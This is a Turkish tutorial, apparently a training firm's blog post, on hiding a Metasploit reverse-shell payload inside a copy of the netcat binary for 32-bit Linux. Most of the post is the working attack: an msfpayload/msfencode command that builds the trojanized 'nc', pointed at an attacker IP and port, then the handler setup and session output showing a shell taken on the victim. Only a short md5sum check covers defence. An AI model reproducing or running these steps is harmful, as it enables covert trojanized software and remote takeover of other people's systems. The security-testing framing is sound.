Linux Binary Backdoor – Varolan Bir Uygulamaya Arka Kapı Yerleştirme


Linux sistemler güvenliği ve güvenirliği ile bilinir. Sunucu alt yapısında diğer işletim sistemlerine göre performansı ve esnekliğine nazaran daha çok tercih edilir. Ubuntu vb. son kullanıcıya hitap eden desktop sürümleride yayınlaşmaktadır.Linux sistemlerde virus tehlikesi diğer işletim sistemlerine göre sayılmayacak kadar az olsada exploit/backdoor/rootkit tehlikesi sıkça yaşanmaktadır. Bu yazıda, linux sistem güvenliğini test etmek için bir linux uygulamasına nasıl backdoor ekleneceği ve kurban sistemin komut satırının ele geçirmesi anlatılmıştır.
Örnek, 32 bit linux sistemlerde çalışacak bir uygulamaya, hedef işletim sisteminin, ters bağlantı ile komut satırını saldırgana taşıyacak bir payload yerleştireceğiz;

Linux 32 bit binary payload ve netcat

msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4433 LHOST=6.6.6.112 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc

“nc” uygulaması kurban sistemde çalıştırıldığında netcat uygulaması ön planda çalışacak beraberinde arka kapı oluşacaktır.

# nc -lvp 1453

Saldirgan, ters bağlantıya yanıt vermek için dinleme moduna geçmeli;

msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > set LHOST 6.6.6.112
LHOST => 6.6.6.112
msf exploit(handler) > set LPORT 4433
LPORT => 4433
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 6.6.6.112:4433
[*] Starting the payload handler…
[*] Command shell session 2 opened (6.6.6.112:4433 -> 6.6.6.114:53678) at 2012-02-22 16:23:04 +0200

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2…

id
uid=1000(ozanucar) gid=1000(ozanucar) groups=1000(ozanucar),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)

Linux sistemler için antivirus,hids vb. yazılımları genellikle kullanılmadığından veya az tercih edildiğinden bu tür tehlikelere fazlasıyla açıktırlar.

Dikkat Edilmesi Gerekenler;

Kaynağı güvensiz uygulamalar kurmamak/kullanmamak, kullanılması durumunda, md5sum değerinin kontrol edilmesi öncelikli korunma yöntemleridir.

Örnek md5sum kontrolü;

Netcat uygulamasının orjinali ve md5sum değeri;

# md5sum /bin/nc
781eb495b27a7aac194efe0b2a7c7c49 /bin/nc

Uygulamaya arka kapı eklendikden sonraki md5sum değeri;

# md5sum nc
f906ca10bc6eef94f7d8740747542834 nc

Yazar:
Ozan UÇAR
ozan.ucar@bga.com.tr

Bu yazıda yer alan araç ve yöntemlerin daha fazlasına “Metasploit Exploitation Framework Pentest” eğitime katılarak öğrenebilirsiniz.

Eğitimle ilgili detay bilgi için lütfen egitim@bga.com.tr adresine e-posta gönderiniz.